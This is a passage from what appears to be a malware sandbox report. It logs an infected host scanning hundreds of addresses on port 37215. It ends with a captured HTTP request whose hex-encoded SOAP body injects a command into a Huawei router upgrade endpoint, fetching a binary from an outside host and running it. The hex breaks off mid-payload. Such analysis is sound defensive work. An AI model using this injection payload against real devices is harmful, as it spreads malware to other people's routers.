              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.182.220.130:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 165.165.25.166:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 42.175.74.40:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.57.152.48:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.121.201.36:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.155.165.6:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.78.116.173:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.149.39.40:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.220.23.19:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 50.65.217.163:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.139.50.77:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.217.254.212:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 77.91.60.77:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.79.184.91:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.210.253.35:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 36.133.2.22:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.193.196.191:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.196.46.26:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.25.235.47:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.198.161.164:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.50.161.251:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.178.27.237:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 100.216.31.185:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 70.35.156.231:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.157.9.65:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.50.19.160:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.192.243.115:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 195.50.59.12:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.116.101.110:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.70.217.6:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.141.137.220:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.182.44.198:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.53.245.177:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.56.177.154:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.152.39.88:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.2.101.65:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 161.93.78.252:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 74.78.108.5:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 1.19.144.227:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 133.127.164.208:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.29.171.210:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.233.194.139:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.36.254.8:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.44.7.74:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.117.16.77:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.43.240.243:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 101.81.140.134:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 86.49.201.217:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.145.9.109:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 35.190.101.68:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 59.174.132.175:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 115.223.3.232:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.197.131.188:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.96.5.249:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.214.65.125:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 101.10.81.42:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.46.117.189:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.192.95.151:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.122.245.182:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.238.249.136:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.45.220.14:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.89.236.217:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 207.71.102.191:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.178.226.123:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.45.1.103:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.75.197.17:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 78.55.59.64:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.85.57.167:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.84.237.226:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 189.28.113.218:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.215.23.92:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 2.224.230.39:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 116.12.83.248:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 27.145.118.194:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.32.43.168:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 79.46.135.45:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 175.126.181.215:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.97.64.174:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.212.73.55:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.79.72.206:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.93.197.124:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.116.104.109:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.159.141.201:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 107.145.4.168:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.214.192.118:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.159.148.97:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.214.77.220:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 125.132.3.102:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.204.83.49:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.56.120.39:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.76.130.47:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.164.96.194:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 174.56.64.97:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 199.193.174.232:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 223.115.119.194:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.249.19.29:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.143.193.138:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 39.140.104.155:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.22.205.16:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.32.48.248:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 122.104.21.215:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.65.159.111:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.69.16.178:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.231.143.93:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.42.22.20:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.205.5.247:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 67.139.162.179:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.149.136.89:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 142.62.45.166:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.196.34.84:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 44.223.208.109:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 93.183.83.58:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.47.210.155:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.140.3.204:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 150.174.118.145:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.152.90.83:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.7.28.77:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.99.48.28:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.65.67.102:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 115.252.166.135:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.131.249.81:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.126.47.96:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.252.147.46:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.216.221.183:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 45.180.40.130:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.170.190.42:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.184.53.83:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 49.214.89.131:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 154.147.222.138:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 161.203.122.78:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 69.88.47.230:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.168.159.85:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.114.88.61:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.172.90.40:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.1.169.138:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.230.253.119:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.242.135.117:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 162.92.235.253:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 183.123.230.19:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 78.184.209.66:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.110.55.47:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 20.65.6.134:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.199.183.79:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.32.87.192:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 14.92.47.136:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.5.26.53:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 195.147.181.247:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.11.104.86:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 202.33.85.2:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.188.4.163:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.22.248.14:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.227.108.237:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 97.107.50.31:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.116.48.164:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 66.103.255.233:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.149.229.93:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.36.217.192:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.113.6.192:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.80.238.70:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.165.193.127:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.157.240.207:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.47.67.249:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.144.14.120:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.165.193.237:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 27.81.141.192:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.148.125.104:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 163.231.211.7:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.154.242.118:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.10.100.131:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.82.92.248:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 175.99.120.5:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.209.4.226:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.47.159.141:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 85.19.25.69:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 102.175.34.93:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.67.255.21:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.24.98.56:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 149.159.235.238:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.19.16.87:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.152.179.106:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.96.87.156:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.38.252.152:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 212.88.131.112:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.251.190.175:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.83.72.79:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 52.69.205.76:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.150.79.236:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.232.156.71:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.26.71.39:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.135.166.29:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.151.53.203:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 195.142.118.51:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.135.52.146:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.87.80.162:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.11.99.130:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.94.147.5:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.239.144.156:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.129.98.177:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 101.32.103.0:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 164.0.75.244:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.199.134.2:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.5.249.222:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.145.8.75:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 12.94.124.149:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.116.227.183:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.108.84.4:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.233.56.160:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.109.133.66:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.142.55.195:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 158.55.218.163:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.218.97.127:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 99.183.69.172:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.208.167.208:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 176.51.54.179:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 144.2.14.139:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.2.116.130:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.237.17.130:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.59.205.173:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.83.217.158:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.152.135.16:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.85.165.223:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 137.226.220.171:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.246.200.100:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.113.76.8:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 134.86.201.202:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 93.69.16.186:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.229.101.55:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.133.107.124:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.159.0.132:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.100.107.228:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.243.131.198:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.100.208.252:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.140.124.164:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 107.77.251.15:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.57.146.222:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.114.129.186:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.224.209.86:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.214.23.190:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.155.22.157:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.38.4.86:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.21.158.194:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.103.193.3:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.141.134.40:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.143.180.214:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 195.52.125.121:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.151.51.234:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.10.53.132:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.34.251.79:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.3.183.185:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.104.56.19:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.149.71.208:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.238.217.184:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.161.221.9:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.143.140.233:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.114.156.28:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.58.246.106:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 107.90.210.8:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.95.71.92:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.201.128.248:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 90.97.158.1:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.221.133.166:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.19.145.246:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 81.167.244.227:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.180.134.196:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.241.50.160:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 82.243.2.134:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.16.238.230:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.150.233.221:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.250.125.183:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.45.46.185:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.145.251.115:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.138.111.197:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 23.234.227.110:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.135.165.241:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.242.1.36:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.180.195.235:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 114.117.105.67:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.19.80.236:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 191.10.12.205:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 180.110.69.4:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.203.247.136:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.149.124.127:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.99.114.192:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.14.166.224:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.229.180.144:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.83.170.200:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.1.12.189:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.63.174.191:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 88.13.216.243:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.197.191.76:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.194.217.58:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.102.141.136:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.4.65.228:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.217.144.118:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.186.147.8:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.154.241.195:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.146.147.81:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.238.200.60:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.241.180.90:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.120.235.213:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.229.233.131:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.182.3.229:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.233.72.150:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.16.151.175:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.28.54.139:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.14.203.177:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 149.114.224.111:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.27.173.122:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.56.236.29:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.89.218.148:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.155.117.190:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 65.252.19.187:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.48.76.253:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.249.146.235:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.207.11.22:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 54.119.200.21:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.105.158.45:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.178.15.6:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.62.50.181:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.238.128.42:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.141.143.145:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.111.107.18:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.167.29.118:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.161.161.97:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.39.254.20:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.60.27.227:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.172.141.122:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.186.176.27:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 157.255.239.246:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 145.81.52.110:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 41.73.97.210:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.82.91.197:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 193.239.211.103:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.72.208.211:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.65.247.234:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 197.76.166.181:37215
              Source: global trafficTCP traffic: 192.168.2.23:2532 -> 64.199.82.44:37215
              Source: unknownDNS traffic detected: query: BC@^]B replaycode: Name error (3)
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 